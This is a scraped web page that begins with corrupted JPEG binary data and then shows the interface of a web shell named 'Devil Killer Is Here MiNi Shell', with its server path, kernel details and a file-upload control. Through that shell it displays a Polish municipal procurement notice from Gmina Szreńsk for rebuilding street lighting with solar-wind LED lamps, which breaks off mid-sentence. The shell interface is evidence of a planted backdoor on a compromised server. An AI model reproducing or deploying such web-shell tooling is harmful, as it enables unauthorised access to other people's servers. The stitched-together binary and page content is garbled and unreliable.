JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250710/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250710/0031964101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa oświetlenia ulicznego w miejscowościach Krzywki Bośki, Grądek, Miłotki,<br/>Szreńsk, Miączyn Mały, Złotowo” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Szreńsk</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 130378462</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Kanoniczny 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szreńsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">06-550</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL922 - Ciechanowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">23 653 40 38</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">23 653 40 38 wew. 24</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">szrensk@szrensk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szrensk.biuletyn.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa oświetlenia ulicznego w miejscowościach Krzywki Bośki, Grądek, Miłotki,<br/>Szreńsk, Miączyn Mały, Złotowo” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7a99bb9f-dd9b-4187-b4f5-6d26d1fb6f75</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00319641</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00035729/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 „Przebudowa oświetlenia ulicznego w miejscowościach Krzywki Bośki, Grądek, Miłotki, Szreńsk, Miączyn Mały, Złotowo”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7a99bb9f-dd9b-4187-b4f5-6d26d1fb6f75 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu: e-Zamówienia (Platformy), która jest dostępna pod adresem: https://ezamowienia.gov.pl.<br/> 14.3 Komunikacja za Pomocą platformy e-Zamówienia<br/>14.3.2. Sposób komunikowania się za pośrednictwem Platformy e-Zamówienia został opisany pod <br/>adresem: https://ezamowienia.gov.pl <br/>14.4. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą (nie dotyczy składania ofert): <br/>- Elektronicznej Skrzynki Podawczej ePUAPu Urzędu Gminy w Szreńsku pod adresem: <br/>/tx5276cxar/SkrytkaESP<br/>- poczty elektronicznej na adres e-mail: szrensk@szrensk.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">14.3.5. Korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>14.3.6.Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>14.3.7. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. <br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa „Regulamin Platformy e-Zamówienia”, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz zamieszczone w zakładce „Centrum pomocy”. <br/>14.3.8. Komunikacja w postępowaniu, przy użyciu platformy e-Zamówienia, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>14.3.9. W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego.<br/>14.3.10. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się <br/>uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). <br/>14.3.11. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawca” na Platformie e-Zamówienia oraz zalogowania się na Platformie e – Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia (dotyczy w szczególności SWZ) wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>14.3.12. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>14.3.14. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. <br/> 14.3.15. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy <br/>e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod <br/>numerem telefonu 22 458 77 99.lub drogą elektroniczną poprzez formularz udostępniony <br/>na stronie internetowej https://ezamowienia.gov.pl w kafelku „Moje zgłoszenia w Centrum pomocy”- „Nowe zgłoszenie” lub w kafelku „FAQ”- „Nie znalazłem rozwiązania, chcę zgłosić problem”.<br/>14.5. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>14.6. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów <br/>w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, <br/>w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie <br/>Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych <br/>i przekazuje się jako załączniki</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Wójt Gminy w Szreńsku, ul. Plac Kanoniczny 10, 06-550 Szreńsk. Dane kontaktowe: tel. 23 653 40 38;<br/>2.	Z Inspektorem ochrony danych osobowych w Urzędzie Gminy w Szreńsku, można kontaktować się za pomocą adresu: inspektor@odo.info.pl Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego o numerze IRG.ZP.271.2.5.2025pn.„Przebudowa oświetlenia ulicznego w miejscowościach Krzywki Bośki, Grądek, Miłotki, Szreńsk, Miączyn Mały, Złotowo” prowadzonym w trybie podstawowym bez negocjacji na podstawie art. 275 pkt 1 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2024r. poz. 1320),<br/>3.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2024 r. poz.1320.) zwanej dalej „ustawa Pzp”;<br/>4.	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>6.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7.	Posiada Pani/Pan następujące prawa:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8.	Nie przysługuje Pani/Panu natomiast:<br/> − w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IRG.ZP.271.2.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Przebudowa oświetlenia ulicznego w miejscowościach Krzywki Bośki, Grądek, Miłotki, Szreńsk, Miączyn Mały, Złotowo” Zakres robót obejmuje roboty w zakresie przebudowy oświetlenia ulicznego obejmującego dostawę, montaż i uruchomienie kompletnych lamp solarno-wiatrowych LED oświetlenia ulicznego w miejscowościach: Krzywki Bośki, 3 szt., Grądek 3 szt., Miłotki 3 szt., Szreńsk 3 szt., Miączyn Mały 3 szt., Złotowo3 szt. <br/>3.2Szczegółowy opis przedmiotu zamówienia znajduje się w projekcie budowlanym, szczegółowych specyfikacjach technicznych wykonania i odbioru robót budowlanych (SSTWiORB), Specyfikacji Warunków Zamówienia (pomocniczo w przedmiarze robót, który należy traktować jako element pomocniczy do określenia ceny oferty, a ewentualne nieujęte w nim elementy robót wynikające z projektu nie mogą stanowić podstawy do żądania przez Wykonawcę dodatkowego wynagrodzenia) stanowiącymi integralną część umowy, przy czym dokumenty te należy interpretować jako wzajemnie się uzupełniające.<br/>Załączniki do SWZ: a)Złącznik nr 10 przedmiar robót udostępniony jest jedynie poglądowo, ma charakter jedynie informacyjny, ....., b Zał. nr 11 projekt budowlany, c) zał. 12 SSTWiOR Wykonawca zobowiązany jest do:<br/>1)	stosowania w czasie realizacji zamówienia wszelkich obowiązujących przepisów z zakresu prawa budowlanego, BHP, ochrony środowiska, ustawy o odpadach, ppoż. oraz zapewnienia stałego nadzoru technicznego. Wykonawca jest zobowiązany pokryć wszelkie opłaty i kary nałożone przez właściwe podmioty, organy i instytucje za dokonane przez Wykonawcę złamanie prawa, przekroczenie norm i przepisów w trakcie realizacji umowy oraz zawinione zaniedbania, 2)	w czasie realizacji robót, utrzymanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwanie i ...<br/>3)	terminowe i prawidłowe wykonanie przedmiotu umowy, i przekazanie do eksploatacji przedmiotu umowy <br/>4)	prace należy prowadzić w sposób umożliwiający korzystanie z dróg. W razie zaistnienia potrzeby całkowitego lub częściowego zamknięcia ruchu na drodze należy skutecznie poinformować wszystkich mieszkańców o tym fakcie z 24 godzinnym wyprzedzeniem. <br/>W czasie wykonywania robót Wykonawca dostarczy, zainstaluje i będzie obsługiwał wszystkie tymczasowe urządzenia zabezpieczające takie jak: zapory, światła ostrzegawcze, sygnały itp., zapewniając w ten sposób bezpieczeństwo pojazdów i pieszych. <br/>Wykonawca zapewni stałe warunki widoczności w dzień i w nocy tych zapór i znaków, dla których jest to nieodzowne ze względów bezpieczeństwa.<br/>Wszystkie znaki, zapory i inne urządzenia zabezpieczające muszą być zaakceptowane przez Inspektora Nadzoru.<br/>5)	takiego zorganizowania dostaw materiałów i urządzeń .......<br/>6)	zapewnienie na własny koszt bezpiecznych warunków ruchu drogowego i pieszego w rejonie prowadzonych robót. Za bezpieczeństwo ruchu w obrębie odcinka, na którym wykonywane będą roboty od chwili przekazania placu budowy aż do dnia podpisania protokołu odbioru robót odpowiedzialny będzie Wykonawca, 7)zapewnienie dozoru mienia na terenie robót na własny koszt,8)zapewnienie obsługi geodezyjnej przez uprawnione służby geodezyjne, 9)ponoszenia kosztów pełnej obsługi geodezyjnej..<br/>10)wyk. inwentaryzacji geodezyjnej powyk. w 1 eg. u dla każdej lokalizacji lampy, 11)wykonanie przedmiotu umowy z materiałów odpowiadających wymaganiom co do jakości wyrobom dopuszczonym do stosowania w budownictwie zgodnie z ustawą Prawo Budowlane i pozostałymi przepisach prawa. Rok produkcji opraw nie wcześniej niż w 2025r. <br/>12)dostarczenie na każde żądanie Zamawiającego dokumentów potwierdzających parametry techniczne oraz wymagane normy stosowanych materiałów ....13)zapewnienie czystości i porządku w obrębie realizacji przedmiotu umowy,14)ponoszenie pełnej odpowiedzialności za stan i przestrzeganie przepisów bhp, ochronę ppoż. i dozór mienia na terenie robót, jak i za wszelkie szkody powstałe w trakcie trwania robót na terenie przyjętym od Zamawiającego lub mających związek z prowadzonymi robotami,15)ponoszenie pełnej odpowiedzialności za stosowanie i bezpieczeństwo wszelkich działań prowadzonych na terenie robót i poza nim, a związanych z wykonaniem przedmiotu umowy,<br/>16)ponoszenia pełnej odpowiedzialności za szkody oraz następstwa nieszczęśliwych wypadków ....<br/>17)ponoszenie odpowiedzialności za wszelkie szkody będące następstwem niewykonania lub nienależytego wykonania przedmiotu umowy, które to szkody Wykonawca zobowiązuje się pokryć w pełnej wysokości,<br/>18)teren budowy przylega do terenów z zabudową zagrodową i mieszkaniową, Wykonawca będzie realizować roboty w sposób powodujący minimalną niedogodność dla mieszkańców. Wykonawca odpowiada za wszelkie uszkodzenia zabudowy zagrodowej i mieszkaniowej w sąsiedztwie budowy, spowodowane jego działalnością,<br/>19)zabezpieczenie instalacji, urządzeń i obiektów na terenie robót i w jej bezpośrednim otoczeniu, .....20)wszystkie napotkane przewody podziemne na trasach wykonywanych wykopów, mają być zabezpieczone przed uszkodzeniem, a w razie potrzeby podwieszone w sposób zapewniający ich użytkowanie, 21)dbanie o porządek na terenie robót oraz utrzymywanie terenu robót w należytym stanie i porządku oraz w stanie wolnym od przeszkód komunikacyjnych, 22)uporządkowanie terenu budowy po zakończeniu robót, zaplecza budowy, jak również terenów sąsiadujących zajętych .....,23)kompletowanie w trakcie realizacji robót wszelkiej dokumentacji zgodnie z przepisami Prawa bud. 24) usunięcie wszelkich wad i usterek stwierdzonych przez nadzór inwestorski .. 25)niezwłoczne informowanie Zamawiającego i Inspektora nadzoru inwestorskiego o problemach technicznych ..t.26)przedłożenia kosztorysu ofertowego na 2 dni przed podpisaniem umowy,27)zapewnienie własnym staraniem i na własny koszt mediów koniecznych do realizacji przedmiotu zamówienia,28)ochrony znaków geodezyjnych...29)usuwanie na bieżąco z terenu budowy zbędnych materiałów, odpadów i śmieci, utylizacje odpadów budowlanych i30)wykonanie prób i pomiarów .. 31) udziału w naradach koordnacyjnych w terminach uzgodnionych wspólnie z Zamawiającym oraz do prezentacji <br/>32)przekazania Zamawiającemu wraz ze zgłoszeniem gotowości do odbioru kompletnej dokumentacji powykonawczej ...<br/>33)udział w przeglądach gwarancyjnych.<br/>34)Za bezpieczeństwo na terenie przedmiotu umowy od chwili przekazania placu budowy aż do dnia podpisania końcowego protokołu odbioru robót, odpowiedzialny będzie Wykonawca.3.3. Przedmiot zamówienia Wykonawca jest zobowiązany wykonać z należytą starannością, zgodnie z projektem budowlanym, szczegółowymi specyfikacjami technicznymi wykonania i odbioru robót budowlanych (SSTWiORB), Specyfikacją Warunków Zamówienia, obowiązującymi polskimi normami i przepisami prawa, zasadami współczesnej wiedzy technicznej, sztuki budowlanej, wszystkimi obowiązującymi przepisami prawa, uzgodnieniami dokonanymi w trakcie realizacji robót.<br/>3.4.Przedmiot umowy zostanie wykonany z materiałów dostarczonych przez Wykonawcę. Materiały i urządzenia, stosowane przez Wykonawcę podczas realizacji przedmiotu zamówienia mają być fabrycznie nowe i odpowiadać, co do jakości wymogom wyrobów dopuszczonych do stosowania w budownictwie zgodnie z ustawą Prawo budowlane<br/>3.5.Wymagany minimalny okres gwarancji wynosi 48 miesięcy.<br/> 3.6. W przypadku gdyby w dokumentacji przetargowej, przedmiarze robót, specyfikacjach technicznych wykonania i odbioru robót oraz w załącznikach do SWZ Zamawiający określił przedmiot zamówienia poprzez wskazanie znaków towarowych, patentów lub pochodzenia źródła lub szczególnego procesu, które mogłyby doprowadzić do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów należy to traktować wyłącznie, jako rozwiązanie przykładowe. Zamawiający dopuszcza zastosowanie materiałów równoważnych o parametrach technicznych nie gorszych niż określono w dokumentacji projektowej. Wykonawca, który powołuje się na rozwiązania równoważne jest zobowiązany wykazać, że oferowane przez niego materiały, urządzenia, produkty spełniają wymagania określone przez Zamawiającego. Zamawiający uzna, że oferta jest równoważna, jeżeli przedstawia przedmiot zamówienia o właściwościach funkcjonalnych i jakościowych takich samych lub lepszych od tych, które zostały określone w dokumentacji, lecz oznaczonych innym znakiem towarowym, patentem lub pochodzeniem. Przy czym istotne jest to, że produkt równoważny to produkt, który nie jest identyczny, tożsamy z produktem referencyjnym, ale posiada pewne, istotne dla Zamawiającego, zbliżone do produktu referencyjnego cechy i parametry. Do Wykonawcy należy potwierdzenie równoważności. Zaproponowane materiały równoważne będą akceptowane przez Zamawiającego, Inspektora nadzoru i Projektanta.<br/>3.7 Materiały z wykopów nie należą do Zamawiającego. Wykonawca będzie miał obowiązek wywieźć je i zutylizować na własny koszt, zgodnie z obowiązującym prawem w tym zakresie. Jeśli jednak materiały z wykopów zostałyby zakwalifikowane przez Zamawiającego i Inspektora nadzoru inwestorskiego do odzysku, Wykonawca będzie miał obowiązek złożyć je na terenie wskazanym przez Zamawiającego lub wywieźć w miejsce wskazane przez Zamawiającego ( do 10 km).<br/>3.8.Jeżeli w trakcie wykonywania robót wystąpi kolizja z istniejącą infrastrukturą techniczną to po wykonaniu robót należy przywrócić ją do stanu pierwotnego.<br/>3.9.Zaleca się, aby każdy z Wykonawców dokonał oględzin miejsca budowy na etapie sporządzania ofert celem sprawdzenia warunków panujących w terenie.3.10. Wykonawca jest zobowiązany do posiadania ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 3.11.Dostarczenie Zamawiającemu przed wyznaczonym terminem podpisania umowy, ale przed podpisaniem umowy aktualnej polisy OC 